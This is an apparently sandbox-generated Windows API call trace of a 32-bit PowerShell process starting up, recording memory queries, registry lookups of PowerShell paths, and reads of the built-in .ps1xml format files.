	[0224.177] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.178] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.288] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.288] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.289] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.300] GetLastError () returned 0xcb
	[0224.303] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.315] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.315] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.315] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.316] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.317] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.317] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.320] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.322] VirtualQuery (in: lpAddress=0xad974, lpBuffer=0xae974, dwLength=0x1c | out: lpBuffer=0xae974*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeafc | out: phkResult=0xaeafc*=0x358) returned 0x0
	[0224.328] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xaeb64, lpData=0x0, lpcbData=0xaeb60*=0x0 | out: lpType=0xaeb64*=0x1, lpData=0x0, lpcbData=0xaeb60*=0x74) returned 0x0
	[0224.328] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xaeb44, lpData=0x0, lpcbData=0xaeb40*=0x0 | out: lpType=0xaeb44*=0x1, lpData=0x0, lpcbData=0xaeb40*=0x74) returned 0x0
	[0224.328] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xaeb44, lpData=0x3582a0, lpcbData=0xaeb40*=0x74 | out: lpType=0xaeb44*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xaeb40*=0x74) returned 0x0
	[0224.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xae6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0224.328] GetLastError () returned 0xcb
	[0224.422] SetErrorMode (uMode=0x1) returned 0x1
	[0224.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xaeb44 | out: lpFileInformation=0xaeb44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.423] GetLastError () returned 0xcb
	[0224.423] SetErrorMode (uMode=0x1) returned 0x1
	[0224.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.424] GetLastError () returned 0xcb
	[0224.424] SetErrorMode (uMode=0x1) returned 0x1
	[0224.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0224.424] GetLastError () returned 0xcb
	[0224.424] SetErrorMode (uMode=0x1) returned 0x1
	[0224.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.424] GetLastError () returned 0xcb
	[0224.424] SetErrorMode (uMode=0x1) returned 0x1
	[0224.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0224.424] GetLastError () returned 0xcb
	[0224.424] SetErrorMode (uMode=0x1) returned 0x1
	[0224.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.424] GetLastError () returned 0xcb
	[0224.424] SetErrorMode (uMode=0x1) returned 0x1
	[0224.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0224.424] GetLastError () returned 0xcb
	[0224.424] SetErrorMode (uMode=0x1) returned 0x1
	[0224.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0224.425] GetLastError () returned 0xcb
	[0224.425] SetErrorMode (uMode=0x1) returned 0x1
	[0224.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0224.426] GetLastError () returned 0xcb
	[0224.426] SetErrorMode (uMode=0x1) returned 0x1
	[0224.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0224.426] GetLastError () returned 0xcb
	[0224.426] SetErrorMode (uMode=0x1) returned 0x1
	[0224.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0224.426] GetLastError () returned 0xcb
	[0224.426] SetErrorMode (uMode=0x1) returned 0x1
	[0224.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0224.426] GetLastError () returned 0xcb
	[0224.426] SetErrorMode (uMode=0x1) returned 0x1
	[0224.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb38 | out: lpFileInformation=0xaeb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0224.426] GetLastError () returned 0xcb
	[0224.426] SetErrorMode (uMode=0x1) returned 0x1
	[0224.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.427] GetLastError () returned 0xcb
	[0224.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.439] GetLastError () returned 0xcb
	[0224.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.440] GetLastError () returned 0xcb
	[0224.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.442] GetLastError () returned 0xcb
	[0224.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.443] GetLastError () returned 0xcb
	[0224.443] SetErrorMode (uMode=0x1) returned 0x1
	[0224.443] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0224.443] GetLastError () returned 0x0
	[0224.443] GetFileType (hFile=0x32c) returned 0x1
	[0224.443] SetErrorMode (uMode=0x1) returned 0x1
	[0224.443] GetFileType (hFile=0x32c) returned 0x1
	[0224.443] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.444] GetLastError () returned 0x0
	[0224.445] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.445] GetLastError () returned 0x0
	[0224.445] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.445] GetLastError () returned 0x0
	[0224.445] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.445] GetLastError () returned 0x0
	[0224.446] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.446] GetLastError () returned 0x0
	[0224.446] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.446] GetLastError () returned 0x0
	[0224.446] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x9e2, lpOverlapped=0x0) returned 1
	[0224.447] GetLastError () returned 0x0
	[0224.447] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3e88a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3e88a*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0224.447] GetLastError () returned 0x0
	[0224.447] ReadFile (in: hFile=0x32c, lpBuffer=0x2d3f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d3f308*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0224.447] GetLastError () returned 0x0
	[0224.447] CloseHandle (hObject=0x32c) returned 1
	[0224.447] GetLastError () returned 0x0
	[0224.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.447] GetLastError () returned 0x0
	[0224.447] SetErrorMode (uMode=0x1) returned 0x1
	[0224.447] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d503c4 | out: lpFileInformation=0x2d503c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0224.447] GetLastError () returned 0x0
	[0224.447] SetErrorMode (uMode=0x1) returned 0x1
	[0224.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.447] GetLastError () returned 0x0
	[0224.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x32c) returned 0x0
	[0224.448] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0224.448] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0224.448] RegCloseKey (hKey=0x32c) returned 0x0
	[0224.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.448] GetLastError () returned 0x0
	[0224.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.448] GetLastError () returned 0x0
	[0224.461] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x6b9b2cbf, Data2=0x2ac9, Data3=0x4e72, Data4=([0]=0x94, [1]=0xbc, [2]=0xc0, [3]=0xef, [4]=0x5f, [5]=0xa0, [6]=0x16, [7]=0x1a))) returned 0x0
	[0224.575] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xc3c2c378, Data2=0x8d0f, Data3=0x46c3, Data4=([0]=0x97, [1]=0xcb, [2]=0x81, [3]=0xa8, [4]=0x2c, [5]=0xdf, [6]=0xc1, [7]=0x66))) returned 0x0
	[0224.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.577] GetLastError () returned 0x0
	[0224.577] SetErrorMode (uMode=0x1) returned 0x1
	[0224.577] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0224.577] GetLastError () returned 0x0
	[0224.577] GetFileType (hFile=0x32c) returned 0x1
	[0224.577] SetErrorMode (uMode=0x1) returned 0x1
	[0224.578] GetFileType (hFile=0x32c) returned 0x1
	[0224.578] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.579] GetLastError () returned 0x0
	[0224.579] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.579] GetLastError () returned 0x0
	[0224.579] ReadFile (in: hFile=0x32c, lpBuffer=0x2d636ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d636ac*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0224.579] GetLastError () returned 0x0
